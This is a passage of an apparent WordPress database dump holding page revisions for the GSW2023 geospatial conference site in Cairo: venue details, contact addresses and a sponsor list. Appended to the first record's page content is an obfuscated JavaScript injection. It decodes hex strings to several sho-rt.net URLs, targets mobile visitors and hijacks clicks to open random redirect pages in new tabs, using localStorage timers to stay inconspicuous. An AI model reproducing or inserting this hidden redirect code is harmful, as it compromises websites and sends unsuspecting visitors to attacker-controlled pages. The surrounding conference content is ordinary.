!important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 23:45:35','2023-08-15 23:45:35','',3066,'https://gsw2023.com/?p=5228',0,'revision','',0),
(5229,1,'2023-08-15 23:48:52','2023-08-15 23:48:52','[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>\r\n\r\n&nbsp;\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731843{margin-top: -15px !important;}\"]</p>\r\n[vc_separator style=\"shadow\" border_width=\"10\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"]\r\n\r\n[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: 